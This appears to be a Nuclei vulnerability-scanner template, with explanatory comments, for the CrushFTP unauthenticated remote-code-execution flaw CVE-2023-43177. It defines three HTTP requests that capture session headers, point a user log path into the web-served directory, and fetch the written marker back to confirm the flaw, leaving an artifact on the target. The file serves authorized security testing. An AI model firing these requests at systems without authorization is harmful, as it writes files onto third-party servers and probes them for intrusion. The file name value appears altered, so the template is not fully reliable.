# Nuclei template for CVE-2023-43177 (CrushFTP < 10.5.1). The check is
# tagged "intrusive": request 2 sets a user_log_path under ./WebInterface/
# and request 3 fetches from that path, so a successful run leaves an
# artifact on the target. Remediation per the description is upgrading
# CrushFTP to 10.5.1 or later.
id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
    - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.92767
    epss-percentile: 0.98966
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    # Upper bound on requests sent per target; matches the three http steps below.
    max-request: 3
    vendor: crushftp
    product: crushftp
  tags: cve,cve2023,crushftp,unauth,rce,intrusive

# All three requests must match, in order, for the template to fire.
flow: http(1) && http(2) && http(3)

# Per-run random 5-character values used to make the created path unique.
variables:
  dirname: "{{randbase(5)}}"
  filename: "{{randbase(5)}}"

http:
  # Step 1: unauthenticated GET; only captures the currentauth / crushauth
  # response header values for later steps. "internal: true" means this
  # match is never reported on its own.
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  # Step 2: POST using the values captured in step 1. The regex matcher
  # only confirms "crushadmin" is reflected in the response.
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{dirname}}
      # NOTE(review): this points the log path into the web-served
      # directory; after authorized testing, remove the created directory.
      user_log_path: "./WebInterface/{{dirname}}/"
      user_log_file: "{(unknown)}"
      Content-Type: application/x-www-form-urlencoded
    body: |
      post=body

    matchers:
      - type: regex
        regex:
          - "crushadmin"

  # Step 3: confirms the marker written in step 2 is served back from the
  # randomized path. Both conditions are required (condition: and).
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/{(unknown)}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "crushadmin{{dirname}}")
        condition: and
# Signature trailer carried over from the original template. It was
# presumably computed over the original bytes, so it may not verify
# against this reformatted copy — confirm before relying on it.
# digest: 4a0a00473045022100830445e9bba00a117daddfca1259b9ef7a022d6fe27e13f9cb7b40949407bd9c02204a02f01f53e956fcc4b5e30944fd8a5bc1bb49d9f20ff4fb78329f46f5adf916:922c64590222798bb761d5b6d8e72950